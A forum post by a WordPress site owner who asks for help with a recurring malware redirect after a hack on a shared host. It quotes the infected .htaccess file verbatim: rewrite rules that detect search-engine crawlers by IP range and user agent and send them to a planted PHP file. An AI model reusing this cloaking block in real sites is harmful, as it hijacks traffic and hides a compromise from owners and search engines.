paulbanks05So after going through almost all of the steps listed here-
http://codex.wordpress.org/FAQ_My_site_was_hacked
I'm still showing a malware re-direct on my WP built site. It doesn't show up all time, just enough to be re-occuring enough to decimate my traffic and a re-direct to mainnetsoll.com after a clean install of WP, and removal of the infected
-htaccess file, which looked like this:
RewriteEngine on
RewriteBase /
RewriteCond %{HTTP_HOST} (^|www.)thesportsbank.net
RewriteCond %{REQUEST_FILENAME} (\?|$)
RewriteCond %{REMOTE_ADDR} ^66\.249\.[6-9][0-9]\.[0-9]+$ [OR]
RewriteCond %{REMOTE_ADDR} ^74\.125\.[0-9]+\.[0-9]+$ [OR]
RewriteCond %{REMOTE_ADDR} ^64\.233\.1[6-9][0-9]\.[0-9]+$ [OR]
RewriteCond %{HTTP_USER_AGENT} (google|msnbot|[Ss]lurp)
RewriteRule ^(.*)$ core/wp-admin/includes/media. class.php [L]
These files were also infected
wp-admin\includes\media.class.php
wp-content\themes\classic\functions.php
wp-includes\js\tinymce\plugins\spellchecker\classes\utils\utils.php
here's a description of the original attack
http://www.derekfountain.org/security_c99madshell.php
It may have been on the back-end, as I was one of those WP blogs brought down on Network Solutions server on Sun. detailed here
http://wordpress.org/development/2010/04/file-permissions/
luckily, I purchased a new hosting package on another more secure host, and with the help of my regular programmer move everything over this weekend.
I have a couple people on this right now, but I'm genuinely worried that this problem my be severe enough that it's beyond their expertise.
Because we keep removing the malicious code, and yet the re-direct keeps coming back. I can provide a copy of the bad code if needs be, to help speed along the recovery process, but I may need to hire another, very advanced php programmer, know anyone? I want to get this fixed ASAP and will spend the money to do so.
my email paulb05@hotmail.com
